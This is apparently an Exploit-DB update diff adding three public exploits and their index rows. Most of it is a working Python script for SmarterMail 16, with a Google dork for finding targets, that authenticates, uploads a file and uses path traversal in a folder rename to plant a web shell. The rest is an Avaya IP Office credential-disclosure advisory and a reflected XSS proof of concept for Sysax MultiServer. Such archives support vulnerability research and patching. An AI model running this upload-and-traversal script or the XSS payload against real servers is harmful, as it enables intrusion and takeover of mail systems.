DB: 2020-06-13

3 changes to exploits/shellcodes

Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Joomla J2  Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
SmarterMail 16 - Arbitrary File Upload
Avaya IP Office 11 - Password Disclosure
Sysax MultiServer 6.90 - Reflected Cross Site Scripting

exploits/multiple/webapps/48580.py

@@ -0,0 +1,134 @@
+# Exploit Title: SmarterMail 16 - Arbitrary File Upload
+# Google Dork: inurl:/interface/root
+# Date: 2020-06-10
+# Exploit Author: vvhack.org
+# Vendor Homepage: https://www.smartertools.com
+# Software Link: https://www.smartertools.com
+# Version: 16.x
+# Tested on: Windows
+# CVE : N/A
+
+#!/usr/bin/python3
+import requests, json, argparse
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+#example usage:
+#Authenticated
+#python3 exp.py -w http://mail.site.com/ -f ast.aspx
+#Change username & password !
+
+class Tak:
+ 
+  def __init__(self):
+     self.file_upload()
+     self.shell_upload()
+
+  def loginned(self):
+    self.urls = results.wbsn + '/api/v1/auth/authenticate-user'
+    self.myobja = {"username":"mail@mail.com","password":"password","language":"en"}
+    self.xx = requests.post(self.urls, data = self.myobja)
+    self.data = json.loads(self.xx.text)
+    self.das = self.data['accessToken']
+    self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das}
+
+  def loginned_folder(self):
+    self.loginned()
+    self.url = results.wbsn + '/api/v1/mail/messages'
+    myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]}
+    x = requests.post(self.url, data = myobj, headers=self.headers)
+    print(x.text)
+
+  def create_folder(self):
+    self.loginned()
+    self.urlz = results.wbsn + '/api/v1/filestorage/folder-put'
+    myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"}
+    myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"}
+    x = requests.post(self.urlz, data = myobj, headers=self.headers)
+    x = requests.post(self.urlz, data = myobj2, headers=self.headers)
+    print(x.text)
+
+  def file_upload(self):
+      self.create_folder()
+      '''
+      #resumableChunkNumber=1&
+      #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319&
+      #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg&
+      #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
+      #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate",
+      #print(self.xz)
+      #print(self.xz.headers)
+      '''
+      size = os.path.getsize(results.wbsf)
+      print(size)
+      replace_file = results.wbsf.replace(".","")
+      with open(results.wbsf, "rb") as outf:
+          contents = outf.read()
+          multipart_data = MultipartEncoder(
+          fields={
+          "context": "file-storage",
+          #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}',
+          "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}',
+          "resumableChunkNumber": "1",
+          "resumableChunkSize": "2097152",
+          "resumableCurrentChunkSize": str(size),
+          "resumableTotalSize": str(size),
+          "resumableType": "image/jpeg",
+          #"resumableIdentifier": "955319-112097jpg",
+          "resumableIdentifier": str(size) + "-" + str(replace_file),
+          "resumableFilename": results.wbsf,
+          "resumableRelativePath": results.wbsf,
+          "resumableTotalChunks": "1",
+          "file": (
+              'blob',#112097.jpg',
+               #open(file, "rb"),
+               contents,
+               #file,
+               #"image/jpeg"
+               "application/octet-stream"
+               #'text/plain'
+               )
+
+        }
+)
+      '''    
+      http_proxy = "http://127.0.0.1:8080"
+      proxyDict = {
+              "http"  : http_proxy,
+            }
+      '''      
+      # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.)  >> proxies=proxyDict
+      self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, 
+      'Authorization': "Bearer " + self.das, 
+      'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) 
+
+  def shell_upload(self):
+
+   '''
+   http_proxy = "http://127.0.0.1:8080"
+   proxyDict = {
+              "http"  : http_proxy,
+   }
+   '''
+
+   json_data = {
+           "folder": "Root Folder\\testos1\\",
+           "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\",
+           "parentFolder": "",
+           "newParentFolder": "Root Folder\\testos2"
+   }
+   #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict)
+   r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers)
+   print(results.wbsn + "/testos1/" + results.wbsf) 
+
+if __name__ == '__main__':
+
+   parser = argparse.ArgumentParser()
+   parser.add_argument('-f', action='store', dest='wbsf',
+                   help='Filename')
+   parser.add_argument('-w', action='store', dest='wbsn',
+                   help='Target')
+   parser.add_argument('--version', action='version', version='SmartMail Knock Knock')
+   results = parser.parse_args()
+
+   tako = Tak()
+   tako

exploits/multiple/webapps/48581.txt

@@ -0,0 +1,93 @@
+# Exploit Title: Avaya IP Office 11 - Password Disclosure
+# Exploit Author: hyp3rlinx
+# Date: 2020-06-09
+# Vender Homepage: https://downloads.avaya.com
+# Product Link: https://downloads.avaya.com/css/P8/documents/101067493
+# CVE: CVE-2020-7030
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.avaya.com
+
+
+[Product]
+Avaya IP Office v9.1.8.0 - 11
+
+IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively.
+
+
+[Vulnerability Type]
+Insecure Transit Password Disclosure
+
+
+[CVE Reference]
+CVE-2020-7030
+ASA-2020-077
+
+
+[Security Issue]
+A sensitive information disclosure vulnerability exists in the web interface component of IP Office that
+may potentially allow a local user to gain unauthorized access to the component.
+
+The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework
+within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string.
+
+https://<TARGET-IP>:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US
+
+wss://<TARGET-IP>:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0&
+X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true 
+ 
+Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y
+Value: Administrator:Administrator 
+
+The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker.
+The URL plus the credentials can potentially be leaked or stored in some of the following locations.
+
+Browser History
+Browser Cache
+Browser Developer Tools
+Cached by web proxy
+Referer Header
+Web Logs
+Shared Systems
+
+
+[Avaya Products affected]
+Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2
+
+
+[References]
+https://downloads.avaya.com/css/P8/documents/101067493
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: February 19, 2020
+Vendor confirms issue: March 4, 2020
+Vendor release advisory fix : June 3, 2020
+June 4, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/multiple/webapps/48582.txt

@@ -0,0 +1,17 @@
+ # Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
+# Google Dork: n.d.
+# Date: 2020-06-02
+# Exploit Author: Luca Epifanio (wrongsid3)
+# Vendor Homepage: https://www.sysax.com/
+# Software Link: https://www.sysax.com/download.htm
+# Version: MultiServer 6.90
+# Tested on: Windows 10 x64
+# CVE : CVE-2020-13228
+
+There is reflected XSS via the /scgi sid parameter.
+
+PoC:
+http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd
+<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm
+
+PoC Screen: https://pasteboard.co/J9eE2GQ.png

files_exploits.csv

@@ -42804,3 +42804,6 @@ id,file,description,date,author,type,platform,port
 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
 48572,exploits/php/webapps/48572.txt,"Joomla J2  Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
+48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
+48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
+48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,